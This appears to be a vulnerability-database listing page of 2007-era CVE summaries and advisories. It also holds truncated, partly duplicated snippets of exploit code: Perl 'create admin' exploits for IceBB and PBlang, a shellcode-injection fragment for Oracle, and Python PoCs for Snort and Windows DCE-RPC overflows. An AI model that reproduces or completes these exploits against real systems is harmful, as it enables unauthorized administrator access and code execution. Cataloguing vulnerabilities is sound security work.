CVE-2007-2592

Multiple cross-site scripting XSS vulnerabilities in Nokia Intellisync Mobile Suite 6.4.31.2, 6.6.0.107, and 6.6.2.2, possibly involving Novell Groupwise Mobile Server and Nokia Intellisync Wireless Email Express, allow remote attackers to inject arbitrary web script or HTML via the 1 username...

Mandrake Linux Security Advisory : php (MDKSA-2007:102)

A heap buffer overflow flaw was found in the xmlrpc extension for PHP. A script that implements an XML-RPC server using this extension could allow a remote attacker to execute arbitrary code as the apache user. This flaw does not, however, affect PHP applications using the pure-PHP XMLRPC class...

MyBlog 0.9.8 - 'Settings.php' Authentication Bypass

source: https://www.securityfocus.com/bid/23521/info MyBlog is prone to an authentication-bypass vulnerability. Attackers can exploit this issue to bypass the authentication mechanism and then access or overwrite files with arbitrary PHP script code. Script code added to certain files are later...

IceBB 1.0-rc5 - Remote Create Admin

IceBB 1.0-rc5 - Remote Create Admin !/usr/bin/perl IceBB 1.0-rc5 Remote Create Admin Exploit 1. register a user 2. run this exploit with this usage : $perl xpl.pl host&path uname pass 3. login with admin access : - magicquotesgpc = Off Coded & Discovered By Hessam-x / Hessamx-at-Hessamx.net use...

IceBB 1.0-rc5 - Remote Create Admin

!/usr/bin/perl IceBB 1.0-rc5 Remote Create Admin Exploit 1. register a user 2. run this exploit with this usage : $perl xpl.pl host&path uname pass 3. login with admin access : - magicquotesgpc = Off Coded & Discovered By Hessam-x / Hessamx-at-Hessamx.net use LWP::UserAgent; use HTTP::Cookies;...

PBlang <= 4.66z Remote Create Admin Exploit

No description provided by source. !/usr/bin/perl PBlang 4.66z Create Admin Exploit this exploit register a user with admin access Coded & Discovered By Hessam-x / Hessamx-at-Hessamx.net use IO::Socket; use LWP::UserAgent; use HTTP::Cookies; $host = $ARGV0; $uname = $ARGV1; $passwd = $ARGV2; $url...

PBlang 4.66z - Remote Create Admin

PBlang 4.66z - Remote Create Admin !/usr/bin/perl PBlang 4.66z Create Admin Exploit this exploit register a user with admin access Coded & Discovered By Hessam-x / Hessamx-at-Hessamx.net use IO::Socket; use LWP::UserAgent; use HTTP::Cookies; $host = $ARGV0; $uname = $ARGV1; $passwd = $ARGV2; $url...

PBlang <= 4.66z Remote Create Admin Exploit

Exploit for unknown platform in category web applications =========================================== PBlang new or die; $cookiejar = HTTP::Cookies-new; $xpl-cookiejar $cookiejar ; register $reg = $xpl-post$url.'register.php?reg=2', Content = "user" = $uname, "pass" = $passwd, "pass2" = $passwd,...

PBlang 4.66z - Remote Create Admin

!/usr/bin/perl PBlang 4.66z Create Admin Exploit this exploit register a user with admin access Coded & Discovered By Hessam-x / Hessamx-at-Hessamx.net use IO::Socket; use LWP::UserAgent; use HTTP::Cookies; $host = $ARGV0; $uname = $ARGV1; $passwd = $ARGV2; $url = "http://".$host; print q PBLANG...

FrontBase关系数据库服务器create procedure远程栈溢出漏洞

FrontBase是一款企业级的关系数据库服务器。 FrontBase在创建存储过程时存在栈溢出漏洞，允许攻击者获得NT AUTHORITY\SYSTEM或root用户权限。 如果攻击者通过“create procedure” SQL语句传送了超长参数的话，就可以触发这个溢出，导致内存破坏。例如，以下SQL语句： create procedure "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa...

CVE-2007-1511

Buffer overflow in FrontBase Relational Database Server 4.2.7 and earlier allows remote authenticated users, with privileges for creating a stored procedure, to execute arbitrary code via a CREATE PROCEDURE request with a long procedure name...

CVE-2007-1511

Buffer overflow in FrontBase Relational Database Server 4.2.7 and earlier allows remote authenticated users, with privileges for creating a stored procedure, to execute arbitrary code via a CREATE PROCEDURE request with a long procedure name...

oracle 10g (PROCESS_DUP_HANDLE) Local Privilege Elevation (win32)-vulnerability warning-the black bar safety net

include windows. h include stdio. h BOOL InjectShellcodeDWORD oldEIP,CHAR oSID HMODULE hKernel; FARPROC pCreateProc; LPSTR sCommand="cmd.exe"; DWORD dwStrLen; CHAR buff1 0 0; dwStrLen=strlensCommand; hKernel=LoadLibrary"Kernel32.dll"; pCreateProc=GetProcAddresshKernel,"CreateProcessA"; strcpybuff...

Microsoft Windows - DCE-RPC svcctl ChangeServiceConfig2A() Memory Corruption

!/usr/bin/python MS Windows DCE-RPC svcctl ChangeServiceConfig2A 0day Memory Corruption PoC Exploit Bug discovered by Krystian Kloskowski h07 Tested on Windows 2000 SP4 Polish all patches Requires.. - Impacket : http://oss.coresecurity.com/projects/impacket.html - PyCrypto :...

PT-2007-1419 · Oracle · Oracle Database Server

Name of the Vulnerable Software and Affected Versions: Oracle Database Server affected versions not specified Description: The issue allows remote authenticated users to read and modify arbitrary files via full filepaths to utl file functions such as utl file.put line and utl file.get line when u...

Snort 2.6.1 - DCE/RPC Preprocessor Remote Buffer Overflow

!/usr/bin/python Snort DCE/RPC Preprocessor Buffer Overflow Command Execution Version Author: Trirat Puttaraksa http://sf-freedom.blogspot.com For educational purpose only This exploit call calc.exe on Windows XP SP2 + Snort 2.6.1 Note: this exploit use Scapy http://www.secdev.org/projects/scapy/...

Snort 2.6.1 - DCERPC Preprocessor Remote Buffer Overflow

Snort 2.6.1 - DCERPC Preprocessor Remote Buffer Overflow !/usr/bin/python Snort DCE/RPC Preprocessor Buffer Overflow Command Execution Version Author: Trirat Puttaraksa http://sf-freedom.blogspot.com For educational purpose only This exploit call calc.exe on Windows XP SP2 + Snort 2.6.1 Note: thi...

Snort 2.6.1 DCE/RPC Preprocessor Remote Buffer Overflow DoS Exploit

Exploit for multiple platform in category dos / poc =================================================================== Snort 2.6.1 DCE/RPC Preprocessor Remote Buffer Overflow DoS Exploit =================================================================== !/usr/bin/python Snort DCE/RPC Preprocess...

Snort 2.6.1 - DCE/RPC Preprocessor Remote Buffer Overflow (Denial of Service) (PoC)

!/usr/bin/python Snort DCE/RPC Preprocessor Buffer Overflow DoS Author: Trirat Puttaraksa http://sf-freedom.blogspot.com For educational purpose only This exploit just crash Snort 2.6.1 on Fedora Core 4. However, Code Execution may be possible, but I have no time to make it : I will post the...

CVE-2007-0507

SQL injection vulnerability in the Acidfree module for Drupal before 4.6.x-1.0, and before 4.7.x-1.0 in the 4.7 series, allows remote authenticated users with "create acidfree albums" privileges to execute arbitrary SQL commands via node titles...